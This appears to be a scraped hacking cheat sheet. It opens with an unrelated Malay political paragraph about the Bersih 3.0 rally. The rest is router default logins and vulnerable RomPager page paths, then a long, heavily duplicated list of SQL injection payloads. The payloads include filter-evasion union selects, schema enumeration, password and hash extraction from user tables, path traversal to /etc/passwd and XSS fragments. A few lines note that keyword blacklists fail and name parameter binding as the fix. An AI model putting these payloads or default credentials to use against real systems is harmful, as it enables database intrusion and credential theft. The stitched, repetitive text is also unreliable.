Pada 28.4.2012 bersih 3.0 dan pakatan rakyat diketuai oleh pengerusi oleh ambiga dalangnya anuar ibrahim ketua atau wakil melayu untuk dipecah belahkan.bersih 3.0 dan bersih 2.0 akan tiba bersih 4.0. sama juga Bersih 2.0 dan Bersih 3.0 menjelang Bersih 4.0. lapan tuntutan dan 8 tuntutan bersih 3.0
Router Hacking
#HTTP BANNER=RomPager/4.07 UPnP/1.0
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
[SQLi] Cheat Sheet
group_concat(version(),0x3a,database())
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
[SQLi] Template
ADDRESS:
BUGS:
VERSION:
CURRENT DB:
DATABASE:
TABLE:
COLUMN:
COMMENT:
#
#
#
BUGS:
VERSION:
CURRENT DB:
DATABASE:
TABLE:
COLUMN:
COMMENT:
#
#
#
[SQLi] Union Select/Union All Select
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
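Query the server ends up running when the id value is concatenated into the SQL string instead of being bound as a parameter:
SELECT * FROM articles WHERE id='-1' or 1=1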
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
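Filter signatures (these two lines appear to be regular expressions of the kind a WAF applies to the query string, not request values):
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is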
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
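Filter behaviour: each pair below shows a keyword/signature blacklist rejecting one form of a request while accepting an equivalent form. A blacklist of this kind does not remove the injection point; the fix is on the application side (bound parameters, least-privilege database account), with the filter as a secondary layer only.
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1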
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
[SQLi] Order By
AND substring(version(),1,1)=5
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
[SQLi] Group Concat
CoNcAt(version())
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
[SQLi] From Information Schema
/**//*!from*//**//*!information_schema.tables*//**//*!where*//**//*!table_schema=database()*/--+-
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
[SQLi] And/Or
+and 1=0-- -
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’